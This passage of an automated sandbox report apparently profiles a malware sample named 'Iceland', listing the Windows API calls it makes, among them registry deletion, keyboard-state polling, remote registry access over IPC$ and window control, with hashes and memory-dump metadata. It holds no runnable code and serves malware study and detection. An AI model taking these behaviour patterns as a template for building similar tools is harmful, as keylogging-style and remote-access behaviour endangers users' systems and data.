                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AAD7A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00AAD70A
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00AAD71D
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AAD72F
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AAD765
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AAD788
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AAD753
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00A8EFCB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3F215: timeGetTime.WINMM(?,?,00A8EFEB), ref: 00A3F219
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A8EFF8
                                                                                                                                                                                                                                                                • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00A8F01C
                                                                                                                                                                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A8F03E
                                                                                                                                                                                                                                                                • SetActiveWindow.USER32 ref: 00A8F05D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A8F06B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A8F08A
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00A8F095
                                                                                                                                                                                                                                                                • IsWindow.USER32 ref: 00A8F0A1
                                                                                                                                                                                                                                                                • EndDialog.USER32(00000000), ref: 00A8F0B2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A8F374
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A8F38A
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8F39B
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A8F3AD
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A8F3BE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8A9D9
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00A8AA44
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00A8AA64
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00A8AA7B
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00A8AAAA
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00A8AABB
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00A8AAE7
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00A8AAF5
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00A8AB1E
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00A8AB2C
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00A8AB55
                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00A8AB63
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00A86649
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00A86662
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A866C0
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00A866D0
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00A866E2
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A86736
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00A86744
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00A86756
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A86798
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00A867AB
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A867C1
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00A867CE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A21488,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A21865
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00A21521
                                                                                                                                                                                                                                                                • KillTimer.USER32(00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A215BB
                                                                                                                                                                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00A629B4
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A629E2
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A2145A,00000000,?), ref: 00A629F9
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A2145A,00000000), ref: 00A62A15
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00A62A27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 641708696-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A22234: GetWindowLongW.USER32(?,000000EB), ref: 00A22242
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00A22152
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 259745315-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A70D31,00000001,0000138C,00000001,00000000,00000001,?,00A9EEAE,00AF2430), ref: 00A8A091
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00A70D31,00000001), ref: 00A8A09A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A70D31,00000001,0000138C,00000001,00000000,00000001,?,00A9EEAE,00AF2430,?), ref: 00A8A0BC
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00A70D31,00000001), ref: 00A8A0BF
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A8A1E0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A81093
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A810AF
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A810CB
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A810F5
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A8111D
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A81128
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A8112D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AB4AD9
                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00AB4AE0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AB4AF3
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00AB4AFB
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AB4B06
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00AB4B10
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00AB4B1A
                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00AB4B30
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00AB4B3C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA46B9
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AA46E7
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00AA46F1
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA478A
                                                                                                                                                                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00AA480E
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AA4932
                                                                                                                                                                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AA496B
                                                                                                                                                                                                                                                                • CoGetObject.OLE32(?,00000000,00AC0B64,?), ref: 00AA498A
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00AA499D
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AA4A21
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA4A35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 429561992-0
                                                                                                                                                                                                                                                                • Opcode ID: db63abac3a6132e26281b408839a8e4ca2388b498cfe66e5890eaa6d217e2bf9
                                                                                                                                                                                                                                                                • Instruction ID: c5cc6b44d0a871f4015e8e64a7cf27702682216f3dbcabc5064253ef7fea07af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db63abac3a6132e26281b408839a8e4ca2388b498cfe66e5890eaa6d217e2bf9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5C124716043419FC700DF68D88492BBBE9FF8A748F10492DF9899B261DB71ED06CB52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00A98538
                                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A985D4
                                                                                                                                                                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00A985E8
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00AC0CD4,00000000,00000001,00AE7E8C,?), ref: 00A98634
                                                                                                                                                                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A986B9
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00A98711
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00A9879C
                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A987BF
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00A987C6
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00A9881B
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00A98821
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                • Opcode ID: e58abe79cef7117e93c2b98790949e30b1cbf37790c31216c15329f947fbd10b
                                                                                                                                                                                                                                                                • Instruction ID: 5a1ad105b4f77eb4ad93c95d0e5355e1622ac45ddd8e11e3f1e819ad3129d407
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e58abe79cef7117e93c2b98790949e30b1cbf37790c31216c15329f947fbd10b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80C13B75A00115AFCB14DFA8C984DAEBBF9FF49304B1485A8F419DB262DB34ED45CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A8039F
                                                                                                                                                                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00A803F8
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00A8040A
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A8042A
                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00A8047D
                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A80491
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A804A6
                                                                                                                                                                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00A804B3
                                                                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A804BC
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A804CE
                                                                                                                                                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A804D9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                • Opcode ID: f03ca8468619da6c7b09caff66eb68fa6c2825d2f110117925d18d064741cc65
                                                                                                                                                                                                                                                                • Instruction ID: 4644e1b9c325d27129fe30226acc63bea5bb3e1839e194d1d9222fa53119348c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f03ca8468619da6c7b09caff66eb68fa6c2825d2f110117925d18d064741cc65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00416375A00219DFCF14EFA8D844DAE7FB9FF48344F008565E955A7262DB30A946CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8A65D
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00A8A6DE
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00A8A6F9
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00A8A713
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00A8A728
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00A8A740
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00A8A752
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00A8A76A
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00A8A77C
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00A8A794
                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00A8A7A6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                • Opcode ID: cf7cdb70430538dca758d9960cee052176dd52744d4b5de1da47b67318766052
